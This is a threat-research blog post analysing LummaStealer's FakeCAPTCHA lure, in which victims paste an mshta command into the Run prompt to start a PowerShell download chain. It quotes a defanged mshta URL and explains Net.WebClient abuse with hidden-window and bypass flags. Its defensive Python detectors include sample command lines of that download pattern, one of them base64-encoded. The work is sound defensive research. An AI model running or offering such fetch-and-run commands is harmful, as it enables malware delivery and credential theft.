
Analyzing LummaStealer’s FakeCAPTCHA Delivery Tactics

Paste, Click, Compromised

Written by ARC Labs contributor, Shannon Mong

Threat actors continue to evolve their initial access tactics, blending social engineering with lightweight payload delivery to evade detection and scale operations. Binary Defense’s ARC Labs researchers recently analyzed an uptick in campaigns involving LummaStealer (a Malware-as-a-Service platform) and its use alongside a deceptive user prompt method, FakeCAPTCHA.

This research walks through how these campaigns operate, why they’re effective, and most importantly, how you can detect and stop them.

What is LummaStealer?

LummaStealer, also known as LummaC2, is an information stealer active since 2022 and sold on underground forums. Initially named “7.62mm Stealer,” this malware kit is marketed to threat actors of all skill levels and often used in phishing campaigns.

Because LummaStealer operates as a service, each campaign can vary based on the operator and their target. But the goal is consistent: steal sensitive data like browser credentials, crypto wallets, and system info.

In early campaigns, the payload was typically delivered via malicious HTML attachments that mimicked Microsoft Word files. More recent variants are using a FakeCAPTCHA technique that tricks the user into running the payload themselves.

What is FakeCAPTCHA?

FakeCAPTCHA, also referred to as part of a “ClickFix” campaign, masquerades as a common human verification page. Instead of a real CAPTCHA challenge, victims are presented with a fake error, often a “Verification Failed – Network Error” message or a “Human Verification” message.

(Image: AhnLab Security Intelligence Center)

The attacker then directs the victim to run a command manually by:

  1. Pressing Windows + R to open the Run prompt
  2. Pasting a malicious PowerShell or mshta command copied from the clipboard
  3. Hitting Enter

The result: the victim unknowingly executes the first in a series of PowerShell scripts that ends with the delivery of malware.

Breakdown of the Infection Chain

The LummaStealer campaign doesn’t rely on exploits; it relies on tricking the user and abusing built-in native Windows utilities to stay quiet and avoid endpoint detection.

After the FakeCAPTCHA prompt is shown in a LummaStealer/LummaC2 campaign, the user is tricked into pasting a command into the Windows Run prompt. That command triggers a malicious mshta redirect, which downloads a script disguised as a .mp4 file:

mshta hxxps://klipjagemiu[.]shop/web44[.]mp4 

Although it looks like a video file, it’s actually a PowerShell script that kicks off the infection. Once run, it launches a further PowerShell script that downloads another file, this time named web.png. That file contains the actual LummaC2 payload.

The LummaC2 malware is designed to steal sensitive data like browser credentials, cryptocurrency wallets, and other system information.

Once active, it sends the following data to the command-and-control server:

  • hwid: a unique identifier for the infected system
  • pid: a number (1–3) that reflects the type of data exfiltrated
  • lid: likely a Lumma campaign ID used to track infected systems per attacker
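The three beacon fields above have a regular shape that can be checked in captured proxy or sandbox traffic. The following parser is an added example (not ARC Labs code, and the POST bodies are constructed, not real C2 traffic): it treats a form-encoded body as beacon-like only when hwid, pid and lid are all present, and records whether pid falls in the 1–3 range the post describes.

```python
"""Parse and validate the hwid/pid/lid beacon fields from captured HTTP POST
bodies. Added example; the sample bodies below are constructed."""
from urllib.parse import parse_qs

BEACON_FIELDS = ("hwid", "pid", "lid")


def parse_beacon(body: str):
    """Return the beacon fields when the body carries all three, else None."""
    fields = parse_qs(body, keep_blank_values=True)
    if not all(name in fields for name in BEACON_FIELDS):
        return None
    try:
        pid = int(fields["pid"][0])
    except ValueError:
        pid = None
    return {
        "hwid": fields["hwid"][0],
        "pid": pid,
        "lid": fields["lid"][0],
        # The post describes pid as a 1-3 value reflecting the type of data exfiltrated.
        "pid_in_range": pid is not None and 1 <= pid <= 3,
    }


# Constructed sample bodies (placeholder identifiers, not observed values).
SAMPLE_BODIES = [
    "hwid=CONSTRUCTED-HWID-0001&pid=2&lid=placeholder-lid",  # beacon shape from the post
    "username=alice&action=login",                           # ordinary form post
    "hwid=CONSTRUCTED-HWID-0002&pid=9&lid=placeholder-lid",  # beacon fields, pid out of range
]


def triage_bodies(bodies=SAMPLE_BODIES) -> list:
    """Label each body so the result can be routed to a hunting queue."""
    verdicts = []
    for body in bodies:
        beacon = parse_beacon(body)
        if beacon is None:
            verdicts.append("no-beacon-fields")
        elif beacon["pid_in_range"]:
            verdicts.append("lumma-beacon-shape")
        else:
            verdicts.append("beacon-fields-unexpected-pid")
    return verdicts


if __name__ == "__main__":
    for body, verdict in zip(SAMPLE_BODIES, triage_bodies()):
        print(f"{verdict:30} {body}")
```

Field presence alone is a weak signal; in practice this check is combined with the process and download indicators from the rest of the chain rather than used on its own.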

In a recent Binary Defense lab analysis, we ran a LummaStealer sample to observe the full infection chain. After the user runs the initial command, PowerShell spins up a hidden window to execute an obfuscated command.

This leads to the download of the web.png script using the Net.WebClient class, a common PowerShell method for pulling in remote payloads. Although it poses as an image, web.png is actually another script that delivers the final LummaC2 malware to the system.
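Both stages above borrow a media extension (.mp4, then .png) for what is really script text. A defender can catch that disguise by comparing the claimed extension against the response Content-Type and the file's magic bytes. The code below is an added example, not part of the post or the ARC Labs repo: the web44.mp4 URL is the one quoted above, every other host is a placeholder, and the payload bytes are constructed stand-ins rather than the real files.

```python
"""Check whether a downloaded file really is what its extension claims.
Added example; hosts other than the URL quoted in the post are placeholders
and all payload bytes are constructed."""
import string

# Magic-byte checks for the container formats the lures borrow.
MAGIC = {
    ".png": lambda b: b.startswith(b"\x89PNG\r\n\x1a\n"),
    ".mp4": lambda b: len(b) >= 12 and b[4:8] == b"ftyp",
    ".jpg": lambda b: b.startswith(b"\xff\xd8\xff"),
    ".gif": lambda b: b[:6] in (b"GIF87a", b"GIF89a"),
}
EXPECTED_MIME = {".png": "image/png", ".mp4": "video/mp4",
                 ".jpg": "image/jpeg", ".gif": "image/gif"}
# Substrings that indicate script content rather than media (compared lower-cased).
SCRIPT_MARKERS = (b"<script", b"powershell", b"new-object", b"invoke-expression",
                  b"iex ", b"frombase64string", b"net.webclient")
PRINTABLE = set(string.printable.encode())


def extension_of(url: str) -> str:
    """Lower-cased extension of the URL path; accepts defanged '[.]' notation."""
    path = url.split("?", 1)[0].split("#", 1)[0]
    name = path.rsplit("/", 1)[-1].replace("[.]", ".")
    return "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""


def looks_like_text(data: bytes) -> bool:
    """True when the first 512 bytes are almost entirely printable ASCII."""
    sample = data[:512]
    if not sample:
        return False
    return sum(b in PRINTABLE for b in sample) / len(sample) > 0.95


def classify_download(url: str, data: bytes, content_type: str = "") -> str:
    """Return 'match', 'unknown-extension', or a 'mismatch:*' verdict."""
    ext = extension_of(url)
    if ext not in MAGIC:
        return "unknown-extension"
    declared = content_type.split(";", 1)[0].strip().lower()
    if declared and declared != EXPECTED_MIME[ext]:
        return "mismatch:content-type"
    if MAGIC[ext](data):
        return "match"
    if looks_like_text(data) and any(m in data[:4096].lower() for m in SCRIPT_MARKERS):
        return "mismatch:script-content"
    return "mismatch"


# Constructed sample downloads: (url, body bytes, Content-Type header if seen).
SAMPLES = {
    "web44.mp4": ("hxxps://klipjagemiu[.]shop/web44[.]mp4",
                  b'<html><head><script language="VBScript">\n'
                  b"' constructed placeholder body\n</script></head></html>",
                  "text/html"),
    "web.png": ("hxxps://placeholder[.]invalid/web.png",
                b"$c = New-Object Net.WebClient\n# constructed placeholder stage\n", ""),
    "logo.png": ("hxxps://placeholder[.]invalid/logo.png",
                 b"\x89PNG\r\n\x1a\n" + b"\x00" * 16, "image/png"),
    "clip.mp4": ("hxxps://placeholder[.]invalid/clip.mp4",
                 b"\x00\x00\x00\x18ftypisom" + b"\x00" * 8, "video/mp4"),
    "junk.png": ("hxxps://placeholder[.]invalid/junk.png", bytes(range(32)), ""),
    "data.bin": ("hxxps://placeholder[.]invalid/data.bin", b"\x00\x01", ""),
}


def scan(samples=SAMPLES) -> dict:
    """Classify every sample; the result maps sample name to verdict."""
    return {name: classify_download(url, data, ctype)
            for name, (url, data, ctype) in samples.items()}


if __name__ == "__main__":
    for name, verdict in scan().items():
        print(f"{verdict:25} {name}")
```

The Content-Type check fires first because a server that honestly labels an .mp4 URL as text/html has already given the game away; the magic-byte and script-marker checks cover the case where the server lies about the type as well.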

Technical Insight: Net.WebClient in Action

Net.WebClient is the .NET System.Net.WebClient class, which PowerShell can instantiate with New-Object; its methods transfer data to and from a resource named in the PowerShell command line. Threat actors use it to download a second-stage payload, or to exfiltrate data from an initial staging payload or loader. It is often combined with other PowerShell parameters, such as -WindowStyle Hidden and -ExecutionPolicy Bypass, which run the download in a hidden PowerShell window with script execution restrictions disabled, so the Net.WebClient call completes silently within the environment.

Detection Recommendations

Binary Defense recommends the following for defenders:

  • Monitor PowerShell activity for use of the Net.WebClient class (System.Net.WebClient), especially when launched from unexpected parent processes such as mshta.exe or when paired with hidden-window and execution-policy-bypass flags.
  • Monitor external network activity in relation to mshta.exe that may indicate malicious script loading.
  • Look for time-correlated clipboard usage and Run prompt activity.
  • Create detections for staged file downloads, especially when file extensions and MIME types don’t align (e.g., .mp4 or .png used to deliver scripts).
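The process-level recommendations above (Net.WebClient under an mshta.exe parent, hidden-window and bypass flags, mshta.exe reaching out to a remote script, and the Run prompt launching it from explorer.exe) can be expressed as a small triage pass over process-creation telemetry. The script below is an added example, not code from the post or from the ARC Labs hunting repo: it assumes Sysmon-style fields (parent image, image, command line), the events are constructed, and the host serving the web.png stage is a placeholder. It also decodes -EncodedCommand arguments (base64 of UTF-16LE) before matching, so the indicators are not hidden by that encoding.

```python
"""Triage process-creation events for the mshta -> PowerShell -> Net.WebClient
chain. Added example with constructed Sysmon-style records; only the
web44.mp4 URL comes from the post, the web.png host is a placeholder."""
import base64
import ntpath
import re

# Constructed -EncodedCommand payload (PowerShell expects base64 of UTF-16LE text).
ENCODED_DEMO = base64.b64encode(
    "$c = New-Object Net.WebClient; "
    "$c.DownloadString('hxxps://placeholder[.]invalid/web.png')".encode("utf-16le")
).decode("ascii")

POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed Sysmon Event ID 1 style records (not telemetry from the post).
SAMPLE_EVENTS = [
    {"utc": "2025-05-01T10:00:01Z", "parent": EXPLORER, "image": MSHTA,
     "cmdline": "mshta hxxps://klipjagemiu[.]shop/web44[.]mp4"},
    {"utc": "2025-05-01T10:00:02Z", "parent": MSHTA, "image": POWERSHELL,
     "cmdline": "powershell -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
                ".DownloadString('hxxps://placeholder[.]invalid/web.png')\""},
    {"utc": "2025-05-01T10:05:00Z", "parent": EXPLORER, "image": POWERSHELL,
     "cmdline": f"powershell -NoProfile -EncodedCommand {ENCODED_DEMO}"},
    {"utc": "2025-05-01T11:00:00Z", "parent": r"C:\Program Files\Vendor\Updater.exe",
     "image": POWERSHELL, "cmdline": r"powershell -File C:\scripts\inventory.ps1"},
]

# Indicators; the flag patterns accept PowerShell's abbreviated parameter forms.
ENCODED_ARG = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b")
BYPASS = re.compile(r"(?i)-(?:ep|exec|executionpolicy)\s+bypass\b")
WEBCLIENT = re.compile(r"(?i)net\.webclient")
REMOTE = re.compile(r"(?i)\bh(?:xx|tt)ps?://")


def expand_command_line(cmdline: str) -> str:
    """Append the decoded -EncodedCommand text so the indicator checks can see it."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} <decoded:{decoded}>"


def triage_event(ev: dict) -> list:
    """Return the list of indicators an event matches (empty list for no findings)."""
    image = ntpath.basename(ev["image"]).lower()
    parent = ntpath.basename(ev["parent"]).lower()
    cmd = expand_command_line(ev["cmdline"])
    findings = []
    if image == "mshta.exe" and REMOTE.search(cmd):
        findings.append("mshta loading a remote script")
        if parent == "explorer.exe":
            findings.append("mshta launched from explorer.exe (consistent with the Run prompt)")
    if image in ("powershell.exe", "pwsh.exe"):
        if WEBCLIENT.search(cmd):
            findings.append("Net.WebClient download primitive")
        if HIDDEN.search(cmd):
            findings.append("hidden window")
        if BYPASS.search(cmd):
            findings.append("execution policy bypass")
        if parent == "mshta.exe":
            findings.append("PowerShell spawned by mshta.exe")
        if ENCODED_ARG.search(ev["cmdline"]):
            findings.append("encoded command")
    return findings


def triage(events=SAMPLE_EVENTS) -> dict:
    """Map each event timestamp to its findings."""
    return {ev["utc"]: triage_event(ev) for ev in events}


if __name__ == "__main__":
    for ts, hits in triage().items():
        print(ts, "->", hits or "no findings")
```

The first two events, one second apart and chained by parent process, are the pattern worth alerting on as a unit; the encoded-command event shows why decoding must happen before matching, and the updater-launched script shows an ordinary PowerShell invocation producing no findings.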

We’ve also published queries and hunting logic on the ARC Labs repo: https://github.com/BinaryDefense/ARC-Labs-Hunting-Queries

References:

https://asec.ahnlab.com/en/85699/

https://www.joesandbox.com/analysis/1583047/0/html

https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient?view=net-9.0